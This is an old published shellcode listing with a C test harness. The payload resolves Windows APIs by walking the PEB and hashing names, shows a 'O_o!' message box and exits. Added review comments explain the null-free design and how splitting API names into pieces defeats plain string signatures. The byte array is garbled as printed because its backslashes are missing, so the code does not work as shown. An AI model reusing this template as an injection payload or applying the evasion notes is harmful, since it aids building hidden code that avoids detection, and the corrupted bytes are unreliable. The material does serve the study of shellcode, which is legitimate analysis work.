
# Title : Allwin MessageBoxA Shellcode
# Published : 2010-06-11
# Author : RubberDuck


/*
Title: Allwin MessageBoxA Shellcode
Date: 2010-06-11
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule, Mato, cm3l1k1, eat, st1gd3r and others
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Test harness for the payload: keeps the bytes in a local array, prints
 * their length, pauses, then calls the array as if it were a function.
 *
 * NOTE(review): this listing appears to have lost its backslashes in
 * extraction ("xFC" was presumably "\xFC", and "%dn" presumably "%d\n").
 * As printed, the array holds the ASCII characters 'x', 'F', 'C', ...
 * and not machine code - confirm against the original publication.
 *
 * Analyst notes on what the byte values encode (read as 32-bit x86):
 *  - The first bytes read FS:[0x30], which is the PEB pointer on 32-bit
 *    Windows, and then hash names in a rotate-right-by-13 loop. This looks
 *    like module lookup without an import table, which is why the harness
 *    itself links no Windows API.
 *  - ASCII fragments are embedded as immediates: "GetP"/"rocA"/"ddre",
 *    "Load"/"Libr"/"aryA", "user"/"32", "Mess"/"ageB"/"oxA", "O_o!" and
 *    "Exit"/"Proc"/"ess". The API names are split into 4-byte pieces, so a
 *    plain string scan for "MessageBoxA" will not match; signatures need
 *    to match the pieces.
 *  - No x00 value appears in the listing. The x01 filler after "32",
 *    "oxA" and "ess" looks like a placeholder overwritten at run time.
 */
int main(){
    /* Automatic (stack) storage: the payload lives in main's frame. */
    unsigned char shellcode[]=
    "xFCx33xD2xB2x30x64xFFx32x5Ax8B"
    "x52x0Cx8Bx52x14x8Bx72x28x33xC9"
    "xB1x18x33xFFx33xC0xACx3Cx61x7C"
    "x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
    "x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
    "x12x75xDAx8Bx53x3Cx03xD3xFFx72"
    "x34x8Bx52x78x03xD3x8Bx72x20x03"
    "xF3x33xC9x41xADx03xC3x81x38x47"
    "x65x74x50x75xF4x81x78x04x72x6F"
    "x63x41x75xEBx81x78x08x64x64x72"
    "x65x75xE2x49x8Bx72x24x03xF3x66"
    "x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
    "x8Ex03xD3x52x33xFFx57x68x61x72"
    "x79x41x68x4Cx69x62x72x68x4Cx6F"
    "x61x64x54x53xFFxD2x68x33x32x01"
    "x01x66x89x7Cx24x02x68x75x73x65"
    "x72x54xFFxD0x68x6Fx78x41x01x8B"
    "xDFx88x5Cx24x03x68x61x67x65x42"
    "x68x4Dx65x73x73x54x50xFFx54x24"
    "x2Cx57x68x4Fx5Fx6Fx21x8BxDCx57"
    "x53x53x57xFFxD0x68x65x73x73x01"
    "x8BxDFx88x5Cx24x03x68x50x72x6F"
    "x63x68x45x78x69x74x54xFFx74x24"
    "x40xFFx54x24x40x57xFFxD0";

    /*
     * strlen() stops at the first zero byte, so the printed size matches the
     * payload length only because the payload contains none.
     * NOTE(review): "%d" does not match the size_t that strlen() returns, and
     * the argument is unsigned char * where strlen() expects const char *.
     */
    printf("Size = %dn", strlen(shellcode));

    /* Runs the command interpreter's PAUSE; on Windows cmd this waits for a key. */
    system("PAUSE");

    /*
     * Casts the data array to a function pointer and calls it. ISO C does not
     * define this conversion, and it only works where the stack is executable:
     * with DEP/NX enforced for the process the call is expected to fault
     * rather than run the bytes. Build or run it only in an isolated analysis VM.
     */
    ((void (*)())shellcode)();

    /* Presumably not reached: the payload's last resolved call is ExitProcess. */
    return 0;
}